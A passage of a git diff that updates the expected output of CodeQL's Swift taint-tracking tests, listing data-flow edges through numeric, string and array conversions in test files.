| ms1 | conversions.swift:168:6:168:6 | SSA def(ms1) | +| conversions.swift:168:12:168:26 | call to MyString.init(_:) | conversions.swift:168:12:168:27 | ...! | +| conversions.swift:168:12:168:27 | ...! 
| conversions.swift:168:6:168:6 | ms1 | +| conversions.swift:168:21:168:21 | abc | conversions.swift:168:12:168:26 | call to MyString.init(_:) | +| conversions.swift:169:12:169:12 | [post] ms1 | conversions.swift:170:12:170:12 | ms1 | +| conversions.swift:169:12:169:12 | ms1 | conversions.swift:170:12:170:12 | ms1 | +| conversions.swift:170:12:170:12 | [post] ms1 | conversions.swift:171:12:171:12 | ms1 | +| conversions.swift:170:12:170:12 | ms1 | conversions.swift:170:12:170:16 | .description | +| conversions.swift:170:12:170:12 | ms1 | conversions.swift:171:12:171:12 | ms1 | +| conversions.swift:171:12:171:12 | [post] ms1 | conversions.swift:172:12:172:12 | ms1 | +| conversions.swift:171:12:171:12 | ms1 | conversions.swift:171:12:171:16 | .debugDescription | +| conversions.swift:171:12:171:12 | ms1 | conversions.swift:172:12:172:12 | ms1 | +| conversions.swift:174:6:174:6 | SSA def(ms2) | conversions.swift:175:12:175:12 | ms2 | +| conversions.swift:174:6:174:6 | ms2 | conversions.swift:174:6:174:6 | SSA def(ms2) | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:174:12:174:46 | ...! | +| conversions.swift:174:12:174:46 | ...! 
| conversions.swift:174:6:174:6 | ms2 | +| conversions.swift:174:21:174:44 | call to sourceString(_:) | conversions.swift:174:12:174:45 | call to MyString.init(_:) | +| conversions.swift:175:12:175:12 | [post] ms2 | conversions.swift:176:12:176:12 | ms2 | +| conversions.swift:175:12:175:12 | ms2 | conversions.swift:176:12:176:12 | ms2 | +| conversions.swift:176:12:176:12 | [post] ms2 | conversions.swift:177:12:177:12 | ms2 | +| conversions.swift:176:12:176:12 | ms2 | conversions.swift:176:12:176:16 | .description | +| conversions.swift:176:12:176:12 | ms2 | conversions.swift:177:12:177:12 | ms2 | +| conversions.swift:177:12:177:12 | [post] ms2 | conversions.swift:178:12:178:12 | ms2 | +| conversions.swift:177:12:177:12 | ms2 | conversions.swift:177:12:177:16 | .debugDescription | +| conversions.swift:177:12:177:12 | ms2 | conversions.swift:178:12:178:12 | ms2 | +| conversions.swift:182:6:182:6 | SSA def(parent) | conversions.swift:183:12:183:12 | parent | +| conversions.swift:182:6:182:6 | parent | conversions.swift:182:6:182:6 | SSA def(parent) | +| conversions.swift:182:6:182:15 | ... as ... | conversions.swift:182:6:182:6 | parent | +| conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:182:6:182:15 | ... as ... | +| conversions.swift:183:12:183:12 | [post] parent | conversions.swift:184:12:184:12 | parent | +| conversions.swift:183:12:183:12 | parent | conversions.swift:184:12:184:12 | parent | +| conversions.swift:184:12:184:12 | [post] parent | conversions.swift:186:40:186:40 | parent | +| conversions.swift:184:12:184:12 | parent | conversions.swift:186:40:186:40 | parent | +| conversions.swift:186:6:186:6 | SSA def(v3) | conversions.swift:187:12:187:12 | v3 | +| conversions.swift:186:6:186:6 | v3 | conversions.swift:186:6:186:6 | SSA def(v3) | +| conversions.swift:186:6:186:10 | ... as ... | conversions.swift:186:6:186:6 | v3 | +| conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | conversions.swift:186:6:186:10 | ... 
as ... | +| conversions.swift:186:40:186:40 | parent | conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | +| conversions.swift:187:12:187:12 | [post] v3 | conversions.swift:188:12:188:12 | v3 | +| conversions.swift:187:12:187:12 | v3 | conversions.swift:188:12:188:12 | v3 | +| conversions.swift:199:7:199:7 | SSA def(self) | conversions.swift:199:7:199:7 | self[return] | +| conversions.swift:199:7:199:7 | self | conversions.swift:199:7:199:7 | SSA def(self) | +| conversions.swift:200:2:200:2 | SSA def(self) | conversions.swift:200:2:221:2 | self[return] | +| conversions.swift:200:2:200:2 | self | conversions.swift:200:2:200:2 | SSA def(self) | +| conversions.swift:201:7:201:7 | SSA def(arr1) | conversions.swift:203:13:203:13 | arr1 | +| conversions.swift:201:7:201:7 | arr1 | conversions.swift:201:7:201:7 | SSA def(arr1) | +| conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:201:7:201:7 | arr1 | +| conversions.swift:202:7:202:7 | SSA def(arr2) | conversions.swift:204:13:204:13 | arr2 | +| conversions.swift:202:7:202:7 | arr2 | conversions.swift:202:7:202:7 | SSA def(arr2) | +| conversions.swift:202:14:202:33 | [...] | conversions.swift:202:7:202:7 | arr2 | +| conversions.swift:203:13:203:13 | arr1 | conversions.swift:205:13:205:13 | arr1 | +| conversions.swift:204:13:204:13 | arr2 | conversions.swift:206:13:206:13 | arr2 | +| conversions.swift:205:13:205:13 | [post] arr1 | conversions.swift:208:25:208:25 | arr1 | +| conversions.swift:205:13:205:13 | arr1 | conversions.swift:205:13:205:19 | ...[...] | +| conversions.swift:205:13:205:13 | arr1 | conversions.swift:208:25:208:25 | arr1 | +| conversions.swift:206:13:206:13 | [post] arr2 | conversions.swift:209:25:209:25 | arr2 | +| conversions.swift:206:13:206:13 | arr2 | conversions.swift:206:13:206:19 | ...[...] 
| +| conversions.swift:206:13:206:13 | arr2 | conversions.swift:209:25:209:25 | arr2 | +| conversions.swift:208:7:208:7 | SSA def(arr1b) | conversions.swift:210:13:210:13 | arr1b | +| conversions.swift:208:7:208:7 | arr1b | conversions.swift:208:7:208:7 | SSA def(arr1b) | +| conversions.swift:208:15:208:29 | try ... | conversions.swift:208:7:208:7 | arr1b | +| conversions.swift:208:19:208:29 | call to Array.init(_:) | conversions.swift:208:15:208:29 | try ... | +| conversions.swift:208:25:208:25 | arr1 | conversions.swift:215:31:215:31 | arr1 | +| conversions.swift:209:7:209:7 | SSA def(arr2b) | conversions.swift:211:13:211:13 | arr2b | +| conversions.swift:209:7:209:7 | arr2b | conversions.swift:209:7:209:7 | SSA def(arr2b) | +| conversions.swift:209:15:209:29 | try ... | conversions.swift:209:7:209:7 | arr2b | +| conversions.swift:209:19:209:29 | call to Array.init(_:) | conversions.swift:209:15:209:29 | try ... | +| conversions.swift:209:25:209:25 | arr2 | conversions.swift:216:31:216:31 | arr2 | +| conversions.swift:210:13:210:13 | arr1b | conversions.swift:212:13:212:13 | arr1b | +| conversions.swift:211:13:211:13 | arr2b | conversions.swift:213:13:213:13 | arr2b | +| conversions.swift:212:13:212:13 | arr1b | conversions.swift:212:13:212:20 | ...[...] | +| conversions.swift:213:13:213:13 | arr2b | conversions.swift:213:13:213:20 | ...[...] 
| +| conversions.swift:215:7:215:7 | SSA def(arr1c) | conversions.swift:217:13:217:13 | arr1c | +| conversions.swift:215:7:215:7 | arr1c | conversions.swift:215:7:215:7 | SSA def(arr1c) | +| conversions.swift:215:15:215:35 | call to ContiguousArray.init(_:) | conversions.swift:215:7:215:7 | arr1c | +| conversions.swift:216:7:216:7 | SSA def(arr2c) | conversions.swift:218:13:218:13 | arr2c | +| conversions.swift:216:7:216:7 | arr2c | conversions.swift:216:7:216:7 | SSA def(arr2c) | +| conversions.swift:216:15:216:35 | call to ContiguousArray.init(_:) | conversions.swift:216:7:216:7 | arr2c | +| conversions.swift:217:13:217:13 | [post] arr1c | conversions.swift:219:13:219:13 | arr1c | +| conversions.swift:217:13:217:13 | arr1c | conversions.swift:219:13:219:13 | arr1c | +| conversions.swift:218:13:218:13 | [post] arr2c | conversions.swift:220:13:220:13 | arr2c | +| conversions.swift:218:13:218:13 | arr2c | conversions.swift:220:13:220:13 | arr2c | +| conversions.swift:219:13:219:13 | arr1c | conversions.swift:219:13:219:20 | ...[...] | +| conversions.swift:220:13:220:13 | arr2c | conversions.swift:220:13:220:20 | ...[...] 
| +| conversions.swift:226:7:226:7 | SSA def(self) | conversions.swift:226:7:226:7 | self[return] | +| conversions.swift:226:7:226:7 | self | conversions.swift:226:7:226:7 | SSA def(self) | +| conversions.swift:227:6:227:6 | self | conversions.swift:227:6:227:6 | SSA def(self) | +| conversions.swift:227:6:227:6 | self | conversions.swift:227:6:227:6 | SSA def(self) | +| conversions.swift:227:6:227:6 | self | conversions.swift:227:6:227:6 | SSA def(self) | +| conversions.swift:227:6:227:6 | value | conversions.swift:227:6:227:6 | SSA def(value) | +| conversions.swift:229:2:229:2 | SSA def(self) | conversions.swift:230:3:230:3 | self | +| conversions.swift:229:2:229:2 | self | conversions.swift:229:2:229:2 | SSA def(self) | +| conversions.swift:229:7:229:12 | SSA def(v) | conversions.swift:230:12:230:12 | v | +| conversions.swift:229:7:229:12 | v | conversions.swift:229:7:229:12 | SSA def(v) | +| conversions.swift:230:3:230:3 | [post] self | conversions.swift:229:2:231:2 | self[return] | +| conversions.swift:230:3:230:3 | self | conversions.swift:229:2:231:2 | self[return] | +| conversions.swift:235:7:235:17 | SSA def(withUInt) | conversions.swift:236:13:236:13 | withUInt | +| conversions.swift:235:7:235:17 | withUInt | conversions.swift:235:7:235:17 | SSA def(withUInt) | +| conversions.swift:236:13:236:13 | [post] withUInt | conversions.swift:237:14:237:14 | withUInt | +| conversions.swift:236:13:236:13 | withUInt | conversions.swift:237:14:237:14 | withUInt | +| conversions.swift:237:3:237:22 | SSA def(self) | conversions.swift:238:12:238:12 | self | +| conversions.swift:237:10:237:22 | call to Self.init(_:) | conversions.swift:237:3:237:22 | SSA def(self) | +| conversions.swift:238:12:238:12 | [post] self | conversions.swift:235:2:239:2 | self[return] | +| conversions.swift:238:12:238:12 | self | conversions.swift:235:2:239:2 | self[return] | +| conversions.swift:241:7:241:20 | SSA def(withMyValue) | conversions.swift:242:13:242:13 | withMyValue | +| 
conversions.swift:241:7:241:20 | withMyValue | conversions.swift:241:7:241:20 | SSA def(withMyValue) | +| conversions.swift:242:13:242:13 | [post] withMyValue | conversions.swift:243:10:243:10 | withMyValue | +| conversions.swift:242:13:242:13 | withMyValue | conversions.swift:243:10:243:10 | withMyValue | +| conversions.swift:243:3:243:22 | SSA def(self) | conversions.swift:244:12:244:12 | self | +| conversions.swift:244:12:244:12 | [post] self | conversions.swift:241:2:245:2 | self[return] | +| conversions.swift:244:12:244:12 | self | conversions.swift:241:2:245:2 | self[return] | +| conversions.swift:247:7:247:21 | SSA def(withMyValue2) | conversions.swift:248:13:248:13 | withMyValue2 | +| conversions.swift:247:7:247:21 | withMyValue2 | conversions.swift:247:7:247:21 | SSA def(withMyValue2) | +| conversions.swift:248:13:248:13 | [post] withMyValue2 | conversions.swift:249:11:249:11 | withMyValue2 | +| conversions.swift:248:13:248:13 | withMyValue2 | conversions.swift:249:11:249:11 | withMyValue2 | +| conversions.swift:249:7:249:7 | SSA def(x) | conversions.swift:250:10:250:10 | x | +| conversions.swift:249:7:249:7 | x | conversions.swift:249:7:249:7 | SSA def(x) | +| conversions.swift:249:11:249:24 | .v | conversions.swift:249:7:249:7 | x | +| conversions.swift:250:3:250:10 | SSA def(self) | conversions.swift:251:12:251:12 | self | +| conversions.swift:250:10:250:10 | x | conversions.swift:250:3:250:10 | SSA def(self) | +| conversions.swift:251:12:251:12 | [post] self | conversions.swift:247:2:252:2 | self[return] | +| conversions.swift:251:12:251:12 | self | conversions.swift:247:2:252:2 | self[return] | +| conversions.swift:254:14:254:14 | SSA def(self) | conversions.swift:254:2:257:2 | self[return] | +| conversions.swift:254:14:254:14 | self | conversions.swift:254:14:254:14 | SSA def(self) | +| conversions.swift:254:20:254:33 | SSA def(withMyValue) | conversions.swift:255:13:255:13 | withMyValue | +| conversions.swift:254:20:254:33 | withMyValue | 
conversions.swift:254:20:254:33 | SSA def(withMyValue) | +| conversions.swift:255:13:255:13 | [post] withMyValue | conversions.swift:256:10:256:10 | withMyValue | +| conversions.swift:255:13:255:13 | withMyValue | conversions.swift:256:10:256:10 | withMyValue | | simple.swift:12:13:12:13 | 1 | simple.swift:12:13:12:24 | ... .+(_:_:) ... | | simple.swift:12:17:12:24 | call to source() | simple.swift:12:13:12:24 | ... .+(_:_:) ... | | simple.swift:13:13:13:20 | call to source() | simple.swift:13:13:13:24 | ... .+(_:_:) ... | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected index 38d1de0167e..e7dc06ad325 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected 
@@ -1,131 +1,138 @@ edges -| conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Float.init(_:) | provenance | | -| conversions.swift:36:19:36:38 | call to sourceInt(_:) | conversions.swift:36:12:36:39 | call to String.init(_:) | provenance | | -| conversions.swift:37:12:37:39 | call to String.init(_:) | conversions.swift:37:12:37:41 | .utf8 | provenance | | -| conversions.swift:37:19:37:38 | call to sourceInt(_:) | conversions.swift:37:12:37:39 | call to String.init(_:) | provenance | | -| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:40:12:40:12 | arr | provenance | | -| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:41:12:41:12 | arr [Collection element] | provenance | | -| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:42:20:42:20 | arr [Collection element] | provenance | | -| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:43:20:43:20 | arr [Collection element] | provenance | | -| conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:39:12:39:39 | [...] [Collection element] | provenance | | -| conversions.swift:41:12:41:12 | arr [Collection element] | conversions.swift:41:12:41:17 | ...[...] | provenance | | -| conversions.swift:42:20:42:20 | arr [Collection element] | conversions.swift:42:12:42:23 | call to Array.init(_:) | provenance | | -| conversions.swift:43:12:43:23 | call to Array.init(_:) [Collection element] | conversions.swift:43:12:43:26 | ...[...] 
| provenance | | -| conversions.swift:43:20:43:20 | arr [Collection element] | conversions.swift:43:12:43:23 | call to Array.init(_:) [Collection element] | provenance | | -| conversions.swift:44:20:44:42 | call to sourceString(_:) | conversions.swift:44:20:44:44 | .utf8 | provenance | | -| conversions.swift:44:20:44:44 | .utf8 | conversions.swift:44:12:44:48 | call to Array.init(_:) | provenance | | -| conversions.swift:45:12:45:48 | call to Array.init(_:) [Collection element] | conversions.swift:45:12:45:51 | ...[...] | provenance | | -| conversions.swift:45:20:45:42 | call to sourceString(_:) | conversions.swift:45:20:45:44 | .utf8 | provenance | | -| conversions.swift:45:20:45:44 | .utf8 | conversions.swift:45:12:45:48 | call to Array.init(_:) [Collection element] | provenance | | -| conversions.swift:47:13:47:32 | call to sourceInt(_:) | conversions.swift:48:13:48:13 | v | provenance | | -| conversions.swift:51:18:51:50 | call to numericCast(_:) | conversions.swift:52:12:52:12 | v2 | provenance | | -| conversions.swift:51:30:51:49 | call to sourceInt(_:) | conversions.swift:51:18:51:50 | call to numericCast(_:) | provenance | | -| conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | conversions.swift:55:12:55:12 | v4 | provenance | | -| conversions.swift:54:31:54:50 | call to sourceInt(_:) | conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | provenance | | -| conversions.swift:63:11:63:35 | call to abs(_:) | conversions.swift:64:12:64:12 | v7 | provenance | | -| conversions.swift:63:15:63:34 | call to sourceInt(_:) | conversions.swift:63:11:63:35 | call to abs(_:) | provenance | | -| conversions.swift:75:12:75:50 | call to Self.init(_:radix:) [some:0] | conversions.swift:75:12:75:51 | ...! 
| provenance | | -| conversions.swift:75:16:75:38 | call to sourceString(_:) | conversions.swift:75:12:75:50 | call to Self.init(_:radix:) [some:0] | provenance | | -| conversions.swift:77:30:77:49 | call to sourceInt(_:) | conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | provenance | | -| conversions.swift:78:27:78:46 | call to sourceInt(_:) | conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | provenance | | -| conversions.swift:79:12:79:31 | call to sourceInt(_:) | conversions.swift:79:12:79:33 | .littleEndian | provenance | | -| conversions.swift:80:12:80:31 | call to sourceInt(_:) | conversions.swift:80:12:80:33 | .bigEndian | provenance | | -| conversions.swift:109:18:109:39 | call to sourceFloat(_:) | conversions.swift:109:12:109:40 | call to Float.init(_:) | provenance | | -| conversions.swift:111:19:111:40 | call to sourceFloat(_:) | conversions.swift:111:12:111:41 | call to String.init(_:) | provenance | | -| conversions.swift:112:12:112:41 | call to String.init(_:) | conversions.swift:112:12:112:43 | .utf8 | provenance | | -| conversions.swift:112:19:112:40 | call to sourceFloat(_:) | conversions.swift:112:12:112:41 | call to String.init(_:) | provenance | | -| conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | conversions.swift:113:12:113:43 | call to String.init(_:) | provenance | | -| conversions.swift:114:12:114:43 | call to String.init(_:) | conversions.swift:114:12:114:45 | .utf8 | provenance | | -| conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | conversions.swift:114:12:114:43 | call to String.init(_:) | provenance | | -| conversions.swift:115:19:115:41 | call to sourceDouble(_:) | conversions.swift:115:12:115:42 | call to String.init(_:) | provenance | | -| conversions.swift:116:12:116:42 | call to String.init(_:) | conversions.swift:116:12:116:44 | .utf8 | provenance | | -| conversions.swift:116:19:116:41 | call to sourceDouble(_:) | conversions.swift:116:12:116:42 | call to String.init(_:) 
| provenance | | -| conversions.swift:118:18:118:39 | call to sourceFloat(_:) | conversions.swift:118:12:118:40 | call to Float.init(_:) | provenance | | -| conversions.swift:119:41:119:60 | call to sourceInt(_:) | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | provenance | | -| conversions.swift:120:57:120:78 | call to sourceFloat(_:) | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | provenance | | -| conversions.swift:122:44:122:65 | call to sourceFloat(_:) | conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | provenance | | -| conversions.swift:124:12:124:33 | call to sourceFloat(_:) | conversions.swift:124:12:124:35 | .exponent | provenance | | -| conversions.swift:125:12:125:33 | call to sourceFloat(_:) | conversions.swift:125:12:125:35 | .significand | provenance | | -| conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | conversions.swift:126:12:126:37 | .exponent | provenance | | -| conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | conversions.swift:127:12:127:37 | .significand | provenance | | -| conversions.swift:128:12:128:34 | call to sourceDouble(_:) | conversions.swift:128:12:128:36 | .exponent | provenance | | -| conversions.swift:129:12:129:34 | call to sourceDouble(_:) | conversions.swift:129:12:129:36 | .significand | provenance | | -| conversions.swift:136:19:136:42 | call to sourceString(_:) | conversions.swift:136:12:136:43 | call to String.init(_:) | provenance | | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:144:12:144:45 | call to MyString.init(_:) [some:0] | provenance | | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:145:12:145:12 | ms2 | provenance | | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:146:12:146:16 | .description | provenance | | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) | 
conversions.swift:147:12:147:16 | .debugDescription | provenance | | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) [some:0] | conversions.swift:144:12:144:46 | ...! | provenance | | -| conversions.swift:144:12:144:46 | ...! | conversions.swift:145:12:145:12 | ms2 | provenance | | -| conversions.swift:144:12:144:46 | ...! | conversions.swift:146:12:146:16 | .description | provenance | | -| conversions.swift:144:12:144:46 | ...! | conversions.swift:147:12:147:16 | .debugDescription | provenance | | -| conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:144:12:144:45 | call to MyString.init(_:) | provenance | | -| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:153:12:153:12 | parent | provenance | | -| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:154:12:154:12 | parent | provenance | | -| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:156:40:156:40 | parent | provenance | | -| conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:157:12:157:12 | v3 | provenance | | -| conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:158:12:158:12 | v3 | provenance | | -| conversions.swift:156:40:156:40 | parent | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | provenance | | -| conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:173:13:173:13 | arr1 | provenance | | -| conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:175:13:175:19 | ...[...] | provenance | | -| conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:178:25:178:25 | arr1 | provenance | | -| conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:185:31:185:31 | arr1 | provenance | | -| conversions.swift:172:14:172:33 | [...] 
[Collection element] | conversions.swift:174:13:174:13 | arr2 | provenance | | -| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:176:13:176:13 | arr2 [Collection element] | provenance | | -| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:179:25:179:25 | arr2 [Collection element] | provenance | | -| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:186:31:186:31 | arr2 [Collection element] | provenance | | -| conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:172:14:172:33 | [...] [Collection element] | provenance | | -| conversions.swift:176:13:176:13 | arr2 [Collection element] | conversions.swift:176:13:176:19 | ...[...] | provenance | | -| conversions.swift:178:19:178:29 | call to Array.init(_:) [Collection element] | conversions.swift:180:13:180:13 | arr1b | provenance | | -| conversions.swift:178:19:178:29 | call to Array.init(_:) [Collection element] | conversions.swift:182:13:182:13 | arr1b [Collection element] | provenance | | -| conversions.swift:178:25:178:25 | arr1 | conversions.swift:178:19:178:29 | call to Array.init(_:) [Collection element] | provenance | | -| conversions.swift:179:19:179:29 | call to Array.init(_:) [Collection element] | conversions.swift:181:13:181:13 | arr2b | provenance | | -| conversions.swift:179:19:179:29 | call to Array.init(_:) [Collection element] | conversions.swift:183:13:183:13 | arr2b [Collection element] | provenance | | -| conversions.swift:179:25:179:25 | arr2 [Collection element] | conversions.swift:179:19:179:29 | call to Array.init(_:) [Collection element] | provenance | | -| conversions.swift:182:13:182:13 | arr1b [Collection element] | conversions.swift:182:13:182:20 | ...[...] | provenance | | -| conversions.swift:183:13:183:13 | arr2b [Collection element] | conversions.swift:183:13:183:20 | ...[...] 
| provenance | | -| conversions.swift:185:15:185:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:187:13:187:13 | arr1c | provenance | | -| conversions.swift:185:15:185:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:189:13:189:13 | arr1c [Collection element] | provenance | | -| conversions.swift:185:31:185:31 | arr1 | conversions.swift:185:15:185:35 | call to ContiguousArray.init(_:) [Collection element] | provenance | | -| conversions.swift:186:15:186:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:188:13:188:13 | arr2c | provenance | | -| conversions.swift:186:15:186:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:190:13:190:13 | arr2c [Collection element] | provenance | | -| conversions.swift:186:31:186:31 | arr2 [Collection element] | conversions.swift:186:15:186:35 | call to ContiguousArray.init(_:) [Collection element] | provenance | | -| conversions.swift:189:13:189:13 | arr1c [Collection element] | conversions.swift:189:13:189:20 | ...[...] | provenance | | -| conversions.swift:190:13:190:13 | arr2c [Collection element] | conversions.swift:190:13:190:20 | ...[...] 
| provenance | | -| conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | self [v] | provenance | | -| conversions.swift:199:7:199:12 | v | conversions.swift:200:12:200:12 | v | provenance | | -| conversions.swift:200:3:200:3 | [post] self [v] | conversions.swift:199:2:201:2 | self[return] [v] | provenance | | -| conversions.swift:200:12:200:12 | v | conversions.swift:200:3:200:3 | [post] self [v] | provenance | | -| conversions.swift:205:7:205:17 | withUInt | conversions.swift:206:13:206:13 | withUInt | provenance | | -| conversions.swift:211:7:211:20 | withMyValue [v] | conversions.swift:212:13:212:13 | withMyValue [v] | provenance | | -| conversions.swift:212:13:212:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | -| conversions.swift:212:13:212:13 | withMyValue [v] | conversions.swift:212:13:212:25 | .v | provenance | | -| conversions.swift:217:7:217:21 | withMyValue2 [v] | conversions.swift:218:13:218:13 | withMyValue2 [v] | provenance | | -| conversions.swift:217:7:217:21 | withMyValue2 [v] | conversions.swift:219:11:219:11 | withMyValue2 [v] | provenance | | -| conversions.swift:218:13:218:13 | withMyValue2 [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | -| conversions.swift:218:13:218:13 | withMyValue2 [v] | conversions.swift:218:13:218:26 | .v | provenance | | -| conversions.swift:219:11:219:11 | withMyValue2 [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | -| conversions.swift:219:11:219:11 | withMyValue2 [v] | conversions.swift:219:11:219:24 | .v | provenance | | -| conversions.swift:219:11:219:24 | .v | conversions.swift:217:2:222:2 | self[return] | provenance | | -| conversions.swift:219:11:219:24 | .v | conversions.swift:221:12:221:12 | self | provenance | | -| conversions.swift:224:20:224:33 | withMyValue [v] | conversions.swift:225:13:225:13 | withMyValue [v] | provenance | | -| conversions.swift:224:20:224:33 | withMyValue [v] | conversions.swift:226:10:226:10 | withMyValue [v] | 
provenance | | -| conversions.swift:225:13:225:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | -| conversions.swift:225:13:225:13 | withMyValue [v] | conversions.swift:225:13:225:25 | .v | provenance | | -| conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | -| conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:226:10:226:22 | .v | provenance | | -| conversions.swift:232:26:232:43 | call to sourceUInt(_:) | conversions.swift:205:7:205:17 | withUInt | provenance | | -| conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | conversions.swift:211:7:211:20 | withMyValue [v] | provenance | | -| conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | provenance | | -| conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | provenance | | -| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | provenance | | -| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | provenance | | -| conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | provenance | | -| conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | provenance | | -| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | conversions.swift:224:20:224:33 | withMyValue [v] | provenance | | -| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | provenance | | -| conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | provenance | | -| conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:241:35:241:60 | 
call to MyValue.init(_:) [v] | provenance | | +| conversions.swift:45:18:45:38 | call to sourceInt(_:) | conversions.swift:45:12:45:39 | call to Float.init(_:) | provenance | | +| conversions.swift:46:19:46:39 | call to sourceInt(_:) | conversions.swift:46:12:46:40 | call to Double.init(_:) | provenance | | +| conversions.swift:47:19:47:39 | call to sourceInt(_:) | conversions.swift:47:12:47:40 | call to String.init(_:) | provenance | | +| conversions.swift:48:12:48:40 | call to String.init(_:) | conversions.swift:48:12:48:42 | .utf8 | provenance | | +| conversions.swift:48:19:48:39 | call to sourceInt(_:) | conversions.swift:48:12:48:40 | call to String.init(_:) | provenance | | +| conversions.swift:50:12:50:39 | [...] [Collection element] | conversions.swift:51:12:51:12 | arr | provenance | | +| conversions.swift:50:12:50:39 | [...] [Collection element] | conversions.swift:52:12:52:12 | arr [Collection element] | provenance | | +| conversions.swift:50:12:50:39 | [...] [Collection element] | conversions.swift:53:20:53:20 | arr [Collection element] | provenance | | +| conversions.swift:50:12:50:39 | [...] [Collection element] | conversions.swift:54:20:54:20 | arr [Collection element] | provenance | | +| conversions.swift:50:19:50:38 | call to sourceInt(_:) | conversions.swift:50:12:50:39 | [...] [Collection element] | provenance | | +| conversions.swift:52:12:52:12 | arr [Collection element] | conversions.swift:52:12:52:17 | ...[...] | provenance | | +| conversions.swift:53:20:53:20 | arr [Collection element] | conversions.swift:53:12:53:23 | call to Array.init(_:) | provenance | | +| conversions.swift:54:12:54:23 | call to Array.init(_:) [Collection element] | conversions.swift:54:12:54:26 | ...[...] 
| provenance | | +| conversions.swift:54:20:54:20 | arr [Collection element] | conversions.swift:54:12:54:23 | call to Array.init(_:) [Collection element] | provenance | | +| conversions.swift:55:20:55:42 | call to sourceString(_:) | conversions.swift:55:20:55:44 | .utf8 | provenance | | +| conversions.swift:55:20:55:44 | .utf8 | conversions.swift:55:12:55:48 | call to Array.init(_:) | provenance | | +| conversions.swift:56:12:56:48 | call to Array.init(_:) [Collection element] | conversions.swift:56:12:56:51 | ...[...] | provenance | | +| conversions.swift:56:20:56:42 | call to sourceString(_:) | conversions.swift:56:20:56:44 | .utf8 | provenance | | +| conversions.swift:56:20:56:44 | .utf8 | conversions.swift:56:12:56:48 | call to Array.init(_:) [Collection element] | provenance | | +| conversions.swift:58:13:58:32 | call to sourceInt(_:) | conversions.swift:59:13:59:13 | v | provenance | | +| conversions.swift:62:18:62:50 | call to numericCast(_:) | conversions.swift:63:12:63:12 | v2 | provenance | | +| conversions.swift:62:30:62:49 | 